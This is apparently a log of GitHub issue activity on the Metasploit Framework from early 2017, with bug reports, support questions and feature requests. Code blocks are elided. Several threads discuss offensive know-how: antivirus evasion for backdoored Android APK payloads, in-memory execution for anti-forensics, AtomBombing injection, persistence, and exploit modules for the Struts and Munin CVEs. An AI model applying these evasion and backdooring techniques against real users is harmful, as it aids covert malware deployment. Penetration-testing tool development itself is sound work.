[2017-02-23 09:28] void-in commented on #7998
@01010w4 Since the module has been merged some time ago and should be included in the kali metasploit package, you should delete the .rb file from the .msf4/ directory, run msfupdate (just to be sure that you have the latest updates) and then run the module from msfconsole which should pick it from the modules/exploits/windows/misc/ directory rather than the user's .msf4/ directory. That should wo

[2017-02-23 09:52] NoorQureshi commented on #7991
Nope! That's not what I'm trying to do....

[2017-02-23 16:54] REPTILEHAUS opened #8001 "Support OS X for Microsoft Office Word Macro Exploit"
Trying to set the target to 1 (For OSX) and keep getting
Exploit failed: An invalid argument was specified. Invalid target index.

[2017-02-23 17:29] #8001 closed

[2017-02-23 21:05] bwatters-r7 commented on #7991
Are you trying to create a payload that automatically installs itself using the persistence command without needing to call back to the framework listener first?

If so, I do not see how it could be done with a reverse_tcp staged meterpreter payload, as staged payloads contain just enough shellcode to call back to the framework listener and get the rest of the payload.  I am fairly sure that is no

[2017-02-23 21:36] bwatters-r7 commented on #7986
To be clear, this _could_ be a one-line change.  When readline.rb was originally written, ruby was not really great at Unicode, and much of the early code assumes ANSI for both regex and length purposes, regardless of what is in the buffer.
Now, Ruby has great Unicode support and the API for using Unicode is significantly better.  In the past, I have managed to fix problems like this by carefully

[2017-02-23 22:44] wchen-r7 opened #8002 "Stop using migrate -f when an exploit gets a session"
Most exploits still use the meterpreter script to migrate after getting a session, this now generates a warning, therefore we should be using post/windows/manage/priv_migrate.

[2017-02-24 01:19] jeffsass opened #8005 "meterpreter screenshot command doesn't take full screen capture if target Windows machine has custom scale factor set"
meterpreter screenshot command doesn't take full screen capture if target Windows machine has custom scale factor

## Steps to reproduce
1) On a host machine that has a HiDPI screen (like a MacBook Pro with Retina display): setup two VMWare images: One Windows target machine and one Linux attacker machine with metasploit)
1a) On the Windows target machine set a custom scale factor (Right click the

[2017-02-24 03:46] 01010w4 commented on #7998
@void-in  I tried it.
First of all delete .rb file from /usr/share/metasploit-framework/modules/exploits/windows/misc
After that exitted metasploit and run
`root@kali:~# msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]

[*] Checking for updates via the APT repository
[*] Note: expect weekly(ish) updates using this method
Segmentation fault
[*] No updates available
`

And in d

[2017-02-24 04:30] 01010w4 commented on #7998
Fixed by updating Kali. My fault. Thank you @void-in

[2017-02-24 04:44] #7998 closed

[2017-02-24 16:01] bwatters-r7 commented on #7991
Also, after a night of thinking, if that's the functionality you want, do this _carefully_...  If this is part of a professional pen test, creating such a tool runs the risk of installing an untracked, beaconing callback on (hopefully) customer computers.  If firewall rules prevent the callback from reaching you, the host will never be included in your msf database, so you'd essentially be install

[2017-02-24 19:26] darkbushido commented on #7891
What type of hosts were you scanning that db_nmap wasn't giving any info?

[2017-02-24 23:31] #8002 closed

[2017-02-25 02:33] rwhitcroft commented on #7988
I can't reproduce this. After running the module, `services` shows a bunch of results.

Can you please paste the output of `show options`, `show advanced`, and the output you get when you `run` the module?

[2017-02-25 04:26] wwebb-r7 commented on #8005
Best Friday night guess: The bit block transfer API the screenshot extension uses ignores scaling, and will need to be refactored.  I'll poke around some more when I'm able.

[2017-02-25 13:13] greenhand2learn opened #8016 "ms08_067 can't get the session"
[code]

[code]
why it can check the target is vulnerable, but can't get the session ?

[2017-02-25 13:37] zero77 opened #8017 "Request: Running in Memory"
I appreciate there’s lots of work that needs to be dune and that has been requested.
But in the future when time is available can you look at adding the option for, support of complete memory integration of exploits and modules.

 For example, can you get obfuscated exploits and modules to load and run completely in memory and not right anything to disk.

As this would greatly help to evade detect

[2017-02-25 14:51] str4n63r commented on #7988
@rwhitcroft Below is the output of **show options** for Shodan search auxiliary.

msf auxiliary(shodan_search) > show options

Module options (auxiliary/gather/shodan_search):

   Name                Current Setting  Required  Description
   ----           ---------------  --------  -----------
   DATABASE                  true             no        Add search results to the database
   MAXPAGE

[2017-02-25 14:53] str4n63r commented on #7988
@rwhitcroft  Below is the output of show options while executing Shodan search auxiliary.

**Output Link:** http://pastebin.com/7SdqEpr1

[2017-02-25 15:14] void-in commented on #8017
So exploits are always run against a running process in memory and payload is injected and run from the memory as well. Obfuscation is a different thing. Most of the time obfuscating the payload will increase its size which won't fit into the space available for the shellcode.

If you encountered a specific issue which you want to address, please update. Otherwise I am not sure exactly what is req

[2017-02-25 15:18] void-in commented on #8016
Please use https://community.rapid7.com for support queries. These pages are only for bug reports and enhancement requests. Thanks

[2017-02-25 15:18] #8016 closed

[2017-02-25 15:53] zero77 commented on #8017
I knew that exploits where run against a running process but, I didn’t know that happen completely in memory without touching the disk. Also, is the exploit code that is run in memory obfuscated or plain text.
Is this the same process for post exploit modules i.e. loading and running completely from memory without touching the disk.

[2017-02-25 16:34] void-in commented on #8017
Exploit code can't be obfuscated due to the fact that the running process which you are targeting won't be able to de-obfuscate that code. De-obfuscation require the ability to run arbitrary code which you don't have when you send the exploit code to the target process, You are merely interacting with the process (albeit in an interesting way). This is true for the classic memory corruption exploi

[2017-02-25 16:46] h00die commented on #8017
Many of the local privilege escalations also write files to disk. All the Linux ones I've written definitely do

[2017-02-25 20:14] busterb commented on #8017
The plan I have in mind for implementing this is two-fold, at least on the Linux/Unix side, since there are already ways to do this with Windows, e.g. reflective DLL injection. What I want to do is add two possibilities to the new posix meterpreter / mettle:

 1. The ability to spawn a new child process entirely in-memory and run the code there. This would basically follow the same loader mechanis

[2017-02-25 20:37] h00die commented on #8017
Most LPE that write to disk are doing so with 1mb, what about some mettle way that would allocate a ram disk to load the files into.
Not only would this prevent writing to the real disk, but would alleviate having to check if a file exists ahead of time.
That being said I'm not volunteering and have no clue how complicated that would be.

[2017-02-25 20:37] h00die commented on #8017
1mb or less...

[2017-02-25 21:16] pbarry-r7 commented on #7817
Apologies for the churn on checkins there, I should've left off the "Fixes" comment until really ready.  I think I have the module working better now, am testing on various platforms (and with both meterpreter and shell sessions, since the module supports both).

[2017-02-25 22:22] rwhitcroft commented on #7988
I'm seeing the error now, thanks.

[2017-02-25 22:41] wchen-r7 commented on #8017
Some vuln types will simply write to disk. For example: if you load a browser exploit, the malicious page will be on disk. If you exploit an arbitrary write/upload, it will write to disk, etc.

I think the main objective is more focus on AV evasion, and maybe anti-forensics. In-memory is one technique but does not always apply.

[2017-02-25 22:58] FireFart opened #8018 "Feature request: register_dir_for_cleanup"
Currently the filedropper mixin makes `register_files_for_cleanup` available to clean dropped files after a session is created.

Some plugins also need to remove a created folder so a `register_dir_for_cleanup` method would be really handy.

Two plugins I currently know that can use this because the plugin upload creates a folder with the plugin name (in both cases) and the empty folder stays on t

[2017-02-25 23:01] h00die commented on #8018
+1 this.  I'm working on the ntfs-3 debian disaster and within the last 10min thought this would be useful.

[2017-02-26 02:38] pbarry-r7 commented on #7817
OK, [PR is up](https://github.com/rapid7/metasploit-framework/pull/8019).  I believe it addresses the main issue you had, @greenhand2learn, as well as ensuring proper behavior when encountering directories (including user home directories) which contain spaces (per @void-in's comments; thx!).

That said, the module appears to have some unexpected behavior when trying to use the decrypt functionali

[2017-02-26 03:09] rwhitcroft commented on #7988
This is happening when Ruby tries to sort the table by IP address and can't handle a mix of IPv4 and IPv6.

[2017-02-26 04:35] wvu-r7 commented on #8018
Would love to see this. I've been hooking `on_new_session` to run `rm -rf`, lol. Would be happy to implement this, as it's a to-do for me.

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/apache_jetspeed_file_upload.rb#L193

[2017-02-26 09:47] str4n63r commented on #7988
@rwhitcroft Is there anyway that I can filter out only IPv4 addresses while using this auxiliary module?

[2017-02-26 14:00] zero77 commented on #8017
@wchen-r7  `Yes, the objectives I had in mind were, AV evasion, and anti-forensics although arguably they can sometimes be part and parcel, but specifically for exploits and modules as Veil-Evasion works more with payloads.
I think avoiding disk and righting to volatile memory instead is a good way to go although, that said I am interested in the other methods you had in mind.`

@busterb `Yes, DLL

[2017-02-27 01:01] rwhitcroft commented on #7988
Not really. Even specifying a negative regex doesn't work because of how the logic is written. You can try setting the pages to 1, clearing out the database with `hosts -d`, re-running the module, and crossing your fingers you don't get an IPv6 address in the results. You can also try running `services` with the `-S` flag to try to pick out entries that also don't contain IPv6 addresses.

It might

[2017-02-27 04:46] wvu-r7 opened #8022 "A few nil bugs in Hardware Bridge"
Ran into these while my vehicle was off. No problem while on.

I am using live Kali at the moment, so please forgive me if these have already been fixed since the last update. I will retest with my dev env once set up.

[code]

[code]

[code]

[code]

[code]

Here's a good run (vehicle on):

[code]

Fun stuff! Thanks for the great work, @zombieCraig. This sure opens up a lot of doors for us.

#779

[2017-02-27 17:11] wchen-r7 opened #8023 "exploits/multi/fileformat/office_word_macro need to support backward compatibility"
According to MSDN's documentation, adding the ```PtrSafe``` keyword to a ```Declare``` statement is only supported by VBA7. The exploit only uses ```PtrSafe```, therefore might fail against older versions.

[2017-02-27 17:27] busterb commented on #7988
Bumped gem in #8024, this will be fixed in the next release. Thanks all!

[2017-02-27 17:27] #7988 closed

[2017-02-27 19:55] sharprakeshverma commented on #8022
I'm a new contributor to the organisation and I'd like to be assigned to me. Any help on solving my first issue would also be very appreciated.

[2017-02-27 20:05] zombieCraig commented on #8022
@wvu-r7 when the car was off, was the bridge still running or was that closed as well?  Currently there isn't a method to determine if the state between the relay and the hardware client is still active.  I can of course clean up some of these null errors but I'm wondering if there is a bigger problem that needs to be addressed and some more information on the condition at the time of failure woul

[2017-02-27 20:46] wvu-r7 commented on #8022
@zombieCraig: The bridge was still running, yeah. It's just empty packets being dereferenced. If there's a better way to check for that instead of on a case-by-case basis, that'd resolve the crux of this issue. I can gather more info later today. Thanks for the swift response!

[2017-02-27 21:31] wchen-r7 opened #8026 "Add a plugin to notify a new session via text"
When a session is obtained, it would be nice to notify via text

[2017-02-27 21:42] busterb commented on #8026
@darkoperator has had something like this for a while: https://github.com/darkoperator/Metasploit-Plugins/blob/master/twitt.rb

[2017-02-28 02:08] zombieCraig commented on #8022
@wvu-r7 I found the core issue.  The ELM327 reports CAN ERROR when sending packets and the relay was treating that as a valid CAN packet.  Once I added a proper check for ELM327 so that it did not consider that valid CAN traffic (duh) then that fixed the null errors.  I'll upload the fix once I clean up a few other things

[2017-02-28 02:19] wvu-r7 commented on #8022
Ahh, that makes sense. I haven't been deep in the code yet, so I can't comment on how anything is done. I'll be sure to test your fix when it's ready. Thank you!

I just realized how bad my bug report is, too. Will do better next time. Sorry about that.

[2017-02-28 13:03] jvoisin opened #8032 "Module request: CVE-2017-6188"
A neat remote arbitrary file creation as the `www-data` was [recently patched]( https://github.com/munin-monitoring/munin/issues/721 ) in Munin, it might be possible to turn it into a remote code execution.

Since this monitoring solution is used by a lot of people, it might be useful to have a module to exploit this :)

[2017-02-28 13:55] jiachen247 commented on #7160
Oscp spolier alert hahah

[2017-02-28 17:21] itsmeroy2012 commented on #7188
Hi, Would like to know how can I tackle this issue?

[2017-02-28 18:18] egypt commented on #7188
@bermannoah @itsmeroy2012 - The easiest solution here is most likely a special case in `CommandDispatcher::Core#cmd_set` in `lib/msf/ui/console/command_dispatcher.rb`

[2017-02-28 20:01] egypt commented on #7938
Writing back out to the same file (`-o iview64.exe`) may truncate it, which would explain why it didn't look like a PE.

[2017-02-28 20:01] #7938 closed

[2017-02-28 20:15] Chiggins commented on #8026
I'd also argue adding other push notification services, ex. Pushover and Slack. Like make some kind of notification class/mixin that makes it pretty modular to work with adding additional services?

Few of examples of service on this page: https://github.com/jreese/znc-push

[2017-02-28 20:34] Chiggins opened #8033 "Improved bash-like recursive tab completion with modules"
Currently tab completion with module selection is kind of... lacking. Tab completion will work well for the module type, such as exploit, payload, etc, but then it will want to show all the possibilities for that module type, instead of recursing to the next "directory" under it.

[code]

What would be ideal is that from this point, it will tab complete for the payload platform..

[code]

Onward,

[2017-02-28 22:03] wvu-r7 commented on #8033
yes hello

[2017-02-28 22:06] wvu-r7 commented on #7160
Privkey redacted. Thanks for the sharp eye.

[2017-02-28 23:27] kernelsmith commented on #8033
I think I can help

[2017-02-28 23:56] busterb opened #8034 "Improve msfvenom apk evasion"
The apkwash script does some things to bypass fragile av signatures, could be integrated into apk generation directly:

https://github.com/jbreed/apkwash/blob/master/apkwash

https://www.youtube.com/watch?v=z3tPSBo9E_k

[2017-03-01 01:24] sn0wfa11 opened #8035 "A few Priv_migrate issues"
# Overview

Now that post/windows/manage/priv_migrate is the default behavior for Meterpreter "migrate -f", I wanted to document some issues that I have identified and provide a PR for the fix, along with a few improvements.

**PR to follow shortly**

During a pentest class, I identified two issues with this module while interacting with a Windows Vista x86 machine. Both issues are repeatable with

[2017-03-01 02:23] timwr commented on #8034
Great stuff @jbreed
We already do some of those things when we inject into an existing APK (with msfvenom -x), but that script looks like it applies it to the default payload.
It's going to be a little fiddly to support those techniques for the default payload APK. We will need aapt (which is bundled in apktool, I think) to parse AndroidManifest.xml and the resources, and baksmali/smali (or metasm

[2017-03-01 02:35] jbreed commented on #8034
That would be awesome to have something integrated directly into the framework with the mindset to force AV companies to get ahead of the curve. It is sad when it took me a couple hours to manually find all of their signatures, then another day or so to write-up a script for it.

For simply wanting a very small/portable payload like the default payload, this seemed to work best. I wish I would hav

[2017-03-01 02:41] h00die commented on #8032
http://downloads.munin-monitoring.org/munin/dev/2.999.5/munin-2.999.5.tar.gz

[2017-03-01 03:05] kernelsmith commented on #8033
@Chiggins as to why str and words aren't being used, even tho they are passed in, I can't say, but I'm guessing the original intent was to use them, but that intent got lost and it was easier to just return the full paths because they are already available just my enumerating the modules loaded into the framework object.  I think we can "remedy" this tho

[2017-03-01 03:16] wvu-r7 commented on #8033
That method definition is cargo-culted everywhere, so it wouldn't surprise me if those values were never even intended to be used. We can definitely fix this.

[2017-03-01 06:50] timwr commented on #8034
msfvenom -x for apks has moved on a lot recently. I've incorporated some more randomisation into #8038.
I'm happy to keep playing cat and mouse with AV vendors that rely on signatures, feel free to open up an issue here if you find one that can detect it.
@SkullTech I noticed you have an awesome article on injecting into APKs, however it might be worth updating it to say it's now supported with `m

[2017-03-01 06:56] kernelsmith commented on #8033
@Chiggins and I worked on it, and the problem at the moment is when you return any tab completion, something automatically adds a space to the end, which make it really painful to try to tab complete further... for example, w/our mods in place, you try `use[tab][tab]` you get a list of module types, life is good, you do `use expl[tab][tab]` you get back a prompt which has `msf> use exploit ` so yo

[2017-03-01 15:40] dana-at-cp commented on #8034
I am a heavy advocate for pushing mobile security vendors to do better. In my backdoor-apk project I use evasion techniques similar to those of apkwash, msfvenom -x etc. but I also use simple obfuscation of "const-string" values in payload related smali files.

https://github.com/dana-at-cp/backdoor-apk

I inject a custom Java class that is required to unobfuscate the "const-string" values and the

[2017-03-01 17:24] hxrofo opened #8039 "Add scheduled execution to backdoored apk"
I know that android payloads are now persistent even after reboot, but why not modify MainService to trigger the Payload every XXX seconds, maybe using ScheduledExecutorService and ScheduledFuture? I found [this code](https://github.com/giovannicolonna/msfvenom-backdoor-android/blob/master/app/src/main/java/stage/metasploit/com/backdooredapk/MyIntentService.java) which does the trick by periodical

[2017-03-01 20:09] bermannoah commented on #7188
@egypt -- I've built a method in `lib/msf/ui/console/command_dispatcher/core.rb` that triggers a `print_error` if you run `set lhost 127.0.01`. (Case insensitive.) Is there any particular text the error message should have?

[2017-03-01 22:20] bermannoah commented on #7188
I submitted a PR with a rudimentary fix for this -- #8041 -- let me know if there's anything else I should do. Cheers!

[2017-03-01 22:32] bermannoah opened #8042 "add or clarify database creation step to developer docs"
This might seem like a small thing but would it be possible to add something like

"Now, run `rake db:create db:migrate db:test:prepare`."

After this section:
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#create-the-databaseyml

And before this section:
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Env

[2017-03-02 02:10] thecarterb opened #8044 "Add AtomBombing payload for AV evasion"
Has implementing Atom Bombing in Windows payloads and/or making new `windows/atombomb/meterpreter/reverse_xxx` payloads been considered?

***
### Usage References:
http://blog.ensilo.com/atombombing-a-code-injection-that-bypasses-current-security-solutions
https://github.com/BreakingMalwareResearch/atom-bombing
https://breakingmalware.com/injection-techniques/atombombing-brand-new-code-injection-f

[2017-03-02 02:21] timwr commented on #8034
@dana-at-cp obfuscating the strings would be great. I've removed most of them but there are one or two left over. We can wait and see what is flagged next.
Obfuscating strings could also be useful because it allows us to use reflection to obfuscate the code further.
Can you provide the source code for StringObfuscator.class? So it replaces the const-string values with static method calls into that

[2017-03-02 02:25] timwr commented on #8034
I can't decide if there is a better fix for https://github.com/rapid7/metasploit-payloads/pull/175/files
I've moved it to be placed inside the config now (for stageless payloads only), but I wonder if I could somehow convince proguard to strip it out of staged payloads, but keep it in stageless.

[2017-03-02 02:35] OJ commented on #8044
Atom bombing has indeed been considered, at least by me. I'm sure others have considered it too.

Your suggestion of `windows/atombomb/meterpreter/...` doesn't actually make sense. The aim of the stager is to invoke the staged payload. In this example. The stager is `reverse_tcp`, and the stage is `meterpreter`. The stager is what runs when you have code execution already, and it's job is to get a

[2017-03-02 02:55] thecarterb commented on #8044
Ah okay I see your point. As well as migration and priv esc, could it also be used as a form of persistence (compared to exe dropping)?

[2017-03-02 03:06] OJ commented on #8044
Well the proviso there is that you need someone to store the payload. If it's not on disk where does it go?

If you're dropping payloads in the atom table, then you need something to execute it as a backdoor, right? So you need to have something else running or some other way to trigger it. Given you need to invoke a thread or a custom payload to read the atom table to run what it finds, you're ba

[2017-03-02 03:11] thecarterb commented on #8044
In terms of dropping payloads, I was thinking of something like this:
https://youtu.be/rRxuh9fp7QI
Where we get to send the request back to us
On Wed, Mar 1, 2017 at 10:06 PM OJ Reeves <notifications@github.com> wrote:

[2017-03-02 06:30] busterb commented on #7188
@bermannoah have you been able to see the session unreliability with LHOST locally too? I still feel like this is treating the symptom rather than the disease (being a big LHOST=127.0.0.1 user myself and not hitting issues with it so far)

[2017-03-02 06:48] busterb commented on #8042
thanks, will look at this

[2017-03-02 06:58] busterb opened #8045 "improve sshexec to work more nicely with native meterpreter payloads"
## Steps to reproduce

I'd like this to result in a usable session, but currently it is unreliable (I think the ssh stream is getting killed and mettle isn't forking to background):

[code]

[2017-03-02 16:28] bermannoah commented on #7188
@busterb I couldn't get it to fail myself, but I'm not sure how extensively I can test it. I feel like a thing that "fails randomly" as in the original report is hard to prove so it might be worth putting the alert in there, just in case...

[2017-03-02 17:41] bermannoah commented on #8042
@busterb cheers, let me know if there's anything I can do to help

[2017-03-02 18:37] rwhitcroft commented on #8042
That guide does seem pretty long-winded/intimidating for what most users are looking for. You can definitely get away with just running `createuser`, `createdb`, and modifying database.yml.

[2017-03-02 18:43] #5284 closed

[2017-03-03 02:21] Pentoman opened #8049 "Error on MSF SCANS KALI LINUX"
## Steps to reproduce

How'd you do it?

1. Start Msf on kali linux updateted. Gain a shell and start MSF scan ...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

getting the ips and range them to make further scans
RHOSTS

What

[2017-03-03 02:27] Pentoman commented on #8035
Give the settings of the payload migrate priv itself please

it looks like u should use

show options

and put in your own parameters ...also some more delay and timout ??

make ps on the meterpeter

to see the current processes then you can use one of them to migrate ...

[2017-03-03 04:18] sn0wfa11 commented on #8035
Can you please clarify your comment? I'm unsure as to what you are asking or stating as it relates to the issues with the priv_migrate module.

[2017-03-03 04:49] void-in commented on #8035
@Pentoman The post module required datastore options are already filled with default values. When run automatically, the SESSION datastore option is populated with the invoking session so no need to configure anything. What @sn0wfa11 has identified here is related to some issues when the post module is already successfully invoked for the returned session but couldn't perform its intended purpose.

[2017-03-03 05:01] void-in commented on #8049
You are not setting the RHOSTS correctly. You can use:

**A Subnet:**
[code]
**A Range:**
[code]
**From file (one address per line):**
[code]
I am going to close this issue as it is not a bug. For support queries please use https://community.rapid7.com forum.

[2017-03-03 05:01] #8049 closed

[2017-03-03 06:27] yparreira opened #8052 "Module auxiliary/pdf/foxit/authbypass ignoring OUTPUTPATH configuration."
## Steps to reproduce

How'd you do it?

$ cat PDF_Payloads.rc
[code]
$ msfconsole -r PDF_Payloads.rc

## Expected behavior

What should happen?
A: The module should consider the directory I have configured as the output.

## Current behavior

What happens instead?
A:
[*] resource (PDF_Payloads.rc)> Ruby Code (70 bytes)
OUTPUTPATH => /home/yparreira/Malicious
resource (PDF_Payloads.rc)> setg FILEN

[2017-03-03 10:09] Pentoman commented on #8049
Yes i know how to set the RHOSTS :-) Thanks

the point is that the auto modul MSF SCANS... does this error , when i fix the RHOSTS manually it works
sure

but the auto module prints out the wrong variables for further scans ...

thats the point

[2017-03-03 10:53] void-in commented on #8049
If I understand you correctly, you mean the module shouldn't assign the wrong RHOSTS IP addresses and should complain immediately? That wouldn't be possible because datastore values are validated when the module is run.

[2017-03-03 14:24] #8039 closed

[2017-03-03 16:41] dana-at-cp commented on #8034
@timwr You got it. I have some code in the shell script that rewrites const-string values in specific smali files. The StringObfuscator.class includes a static method that can undo the obfuscation. I should mention that the obfuscation mechanism is a simple caesar cipher so eventually it will need to be replaced with something more sophisticated. This was merely to prove that the concept was viabl

[2017-03-03 17:57] wchen-r7 commented on #8052
The OUTPUTPATH datastore option was part of the FILEFORMAT mixin. It looks like we changed it to FILENAME in 2011, but left this module out:

https://github.com/rapid7/metasploit-framework/commit/05fe96cf37fda0d0e3069bd7d6026de1c82b24f4

[2017-03-03 20:06] #8023 closed

[2017-03-03 21:37] #8052 closed

[2017-03-04 06:26] ajdnik commented on #7139
Landed PR #8040, this issue can be closed.

[2017-03-04 09:24] busterb commented on #7139
Thanks @ajdnik

[2017-03-04 09:24] #7139 closed

[2017-03-06 17:06] leebaird opened #8060 "Stacktrace for telnet_encrypt_overflow"
## Steps to reproduce

[code]

### Metasploit version
v4.14.0-dev

### I installed Metasploit with:
Kali package via apt

What OS are you running Metasploit on?
Kali 2016.2 rolling

[2017-03-06 17:09] leebaird opened #8061 "Stacktrace for telnet_version"
## Steps to reproduce

[code]

### Metasploit version
v4.14.0-dev

### I installed Metasploit with:
Kali package via apt

What OS are you running Metasploit on?
Kali 2016.2 rolling

[2017-03-06 17:15] leebaird opened #8062 "Stacktrace for arris_dg950"
## Steps to reproduce
[code]
### Metasploit version
v4.14.0-dev

### I installed Metasploit with:
Kali package via apt

What OS are you running Metasploit on?
Kali 2016.2 rolling

[2017-03-06 20:24] itsmeroy2012 commented on #7188
Hi, I solved this issue , do accept my PR

[2017-03-06 21:28] busterb commented on #4250
Ah, this is fixed!

[2017-03-06 21:28] #4250 closed

[2017-03-06 21:34] busterb commented on #7923
Note, some of these may be trivial fixes, some may need more help. Each error would probably be a separate fix. If in doubt, ask :)

[2017-03-07 06:21] nixawk opened #8064 "CVE-2017-5638 - Apache Struts2 S2-045"
...

[code]

## Lab

1. Please install tomcat yourself
2. Deplay [the vuln struts2 package](https://github.com/nixawk/labs/tree/master/CVE-2017-5638)

<img width="1099" alt="screen shot 2017-03-07 at 02 19 40" src="https://cloud.githubusercontent.com/assets/7352479/23648330/db433cde-02df-11e7-8140-492909b0fab4.png">

## References

https://cwiki.apache.org/confluence/display/WW/S2-045
https://www.

[2017-03-07 08:36] busterb commented on #8061
This should be simple to address - add the appropriate rescue block so the failure is handle more nicely.

[2017-03-07 11:44] nixawk commented on #8064
I'll give a new pr later.

<img width="1140" alt="screen shot 2017-03-07 at 05 43 12" src="https://cloud.githubusercontent.com/assets/7352479/23655027/036a0422-02f9-11e7-8960-a1e65ed6d7ef.png">

[2017-03-07 11:58] Radrigo commented on #7907
Hay gays. How can i fix this?

[2017-03-07 14:50] thecarterb commented on #8064
could this be turned into an exploit? (`cmd/unix` payloads)

[2017-03-07 15:53] busterb commented on #7907
@Wack0 feel free to PR if you like, we can de-hack in review.

[2017-03-07 16:32] eraddatz commented on #7267
Hello - where is this FIX? I am having this issue and trying to resolve. I have re-installed open-vas and metasploit with no avail.

[2017-03-07 16:51] busterb commented on #7267
Hi, how did you install Metasploit?  I'd suggest verifying that you are using a version of Metasploit newer than this PR.

[2017-03-07 17:43] nixawk commented on #8064
[code]

[2017-03-07 19:10] DmitryHetman opened #8068 "Add CIA tools"
https://wikileaks.org/ciav7p1/cms/index.html

[2017-03-07 20:39] itsmeroy2012 commented on #7923
I have solved the INFO message:-

modules/payloads/stagers/python/reverse_tcp_ssl.rb - [INFO] Invalid URL: # This module requires Metasploit: http//metasploit.com

Should I issue a PR?

[2017-03-07 20:54] busterb commented on #7923
sure - be sure it's from a topic branch as we discussed as well :)

[2017-03-07 21:04] itsmeroy2012 commented on #7923
But there isn't any topic branch here. Could you guide me how to issue the pull request to a topic branch?

[2017-03-08 04:16] adv16 commented on #8061
Hey, Can you please guide me on how to get started on this one? I am new to open source but would like to work on this. Thanks

[2017-03-08 06:07] timwr commented on #7923
@itsmeroy2012
[code]

[2017-03-08 06:29] timwr commented on #8068
There are a lot of potential modules there. Some have been redacted, added here already, or have a codenames that make them unclear with CVE/exploit they related to.

I think it would helpful to start breaking down the codenames into exploits (with CVE reference if possible. I have attempted to this a little for the Android exploits here, contributions welcome!

https://wikileaks.org/ciav7p1/cms/p

[2017-03-08 10:47] #7817 closed

[2017-03-08 11:07] busterb opened #8075 "Update PHP Meterpreter SSL Support Code"
See: https://github.com/rapid7/metasploit-framework/pull/7669

The original PR was based on an older layout of the Metasploit repository and no longer applies cleanly. To be able to move forward with the original PR, you would need to:

 1. Move the PHP code into the new repository at rapid7/metasploit-payloads.
 2. Deduplicate / merge the functionality if possible. The original PR just made a cop

[2017-03-08 11:16] xtianus commented on #8064
My client's site was hacked yesterday.
This was in the log:

[code]

[2017-03-08 12:47] busterb commented on #8064
@xtianus please do not post logs from your clients servers to Metasploit pull requests!

[2017-03-08 14:30] busterb commented on #8061
Lots of docs available: https://github.com/rapid7/metasploit-framework#contributing - learning is at _least_ half of the fun!

[2017-03-08 14:43] adv16 commented on #8061
@busterb Thanks mate! I had already started going through those.. I should have checked before posting that first comment... I'll keep my questions specific henceforth :) but can I take this one ? I am setting up the dev environment now.. but looks like I just need to change the exception handling code under
"metasploit-framework/modules/auxiliary/scanner/telnet/telnet_version.rb" , right?

[2017-03-08 14:55] busterb commented on #8061
You said the magic word "I already started!"

Here's the workflow I would use specifically to fix this:

1. start msfconsole
2. use auxiliary/scanner/telnet/telnet_version
3. figure out how to trigger the bug
   * a lot of times, I just point the module RHOSTS at 'nc' listening on the loopback interface
   * e.g. `set RHOSTS 127.0.0.1` `set RPORT 2121` then run in another terminal `nc -lk 127.0.0.

[2017-03-09 11:52] oli-h commented on #8064
Seems to be more an _OGNL_ issue than a _Multipart parser_ issue

[2017-03-09 12:59] havretnet commented on #8064
I've try on my own server but it's doesn't works (An error 500 is displayed).
I've targeted directly IP address.

[2017-03-09 13:13] xtianus commented on #8064
@busterb it was a stacktrace cut before showing any customer-related information, just to help you out and show that the problem exists in real life. But you needed to play smart ass at my expense I guess.

[2017-03-09 14:28] adv16 commented on #8061
@leebaird  I am not able  to reproduce the issue.. can someone help?

[2017-03-09 14:41] busterb commented on #8064
@xtianus there was an internal hostname in there. I wasn't trying to be a smart ass, apologies if that's how it sounded.

[2017-03-09 15:08] xtianus commented on #8064
There was none. You could have edited the hostname-lookalike instead of removing the whole thing, but that wouldn't have attracted 12 smiles I guess.

[2017-03-09 15:17] 0sx opened #8080 "Database failing to start, ~/.msf4/db/log does not exist"
Following the instructions [here](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers#os-x-manual-installation) I installed the latest nightly installer, which was version 4.14.1, on macOS 10.12.3 build 16D32.  I ran

`/opt/metasploit-framework/bin/msfconsole`

and the database was successfully created but failed to start with the error

`No such file or directory @ rb_sysopen -

[2017-03-09 15:19] lukaszlenart commented on #8064
The sad news is that this PR was prepared before we even had a chance to inform users about the new versions and it contains PoC reported to us which means we cannot even trust reporters :(

[2017-03-09 15:36] busterb commented on #8064
My mistake @xtianus. I removed comment above. Here is the backtrace resurrected for reference:

[code]

[2017-03-09 15:54] eraddatz commented on #7267
It is just installed with Kali - version 4.14.0-dev.

[2017-03-09 16:09] busterb commented on #7267
ok @eraddatz , sounds like the fix for this particular issue should be in place then. Can you give a little more detail about what you're seeing?

[2017-03-09 16:18] tsellers-r7 commented on #8064
@oli-h Based on my understanding the problem is that Jakarta Multiparser generates an exception when parsing the Content-Type. While raising this exception it tries to include the invalid data in the error message.  Instead of displaying the invalid data it parses and executes the OGNL.  So, as I understand it, the problem is the Jarkarta Multiparser and the vehicle for exploitation is OGNL.

I th

[2017-03-09 16:25] eraddatz commented on #7267
msf > load openvas
! Omit
[*] Successfully loaded plugin: OpenVAS
----
msf > openvas_connect vas vas 127.0.0.1 9390
[*] Connecting to OpenVAS instance at 127.0.0.1:9390 with username vas...
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
[+] OpenVAS connection successful

[2017-03-09 16:37] eraddatz commented on #7267
That was maybe not so clear - any function where you should see ID #'s - the openvas plugin shows UID's instead and the UID's do not exist so nothing can function.

Such as openvas_format_list, target_list, config_list. All documentation for steps to use openvas inside of msfconsole shows that these should be numbers 0-99 for example and not UID strings.

msf > openvas_format_list
ID

[2017-03-09 16:48] eraddatz commented on #7267
I think I have posted this in alternate issue. I see that this page lists this issue more clearly.

https://github.com/rapid7/metasploit-framework/pull/7294

[2017-03-09 17:08] pbarry-r7 commented on #7267
Hi @eraddatz.  We definitely should be using the UID values with the plugin, sounds like the documentation needs updating.  As far as the broken behavior you're experiencing, I can take a deeper look at this tomorrow (and fixup the documentation while I'm at it).

[2017-03-09 20:46] AddaxSoft opened #8081 "x86/shikata_ga_nai failed with A valid opcode permutation could not be found."
## Steps to reproduce

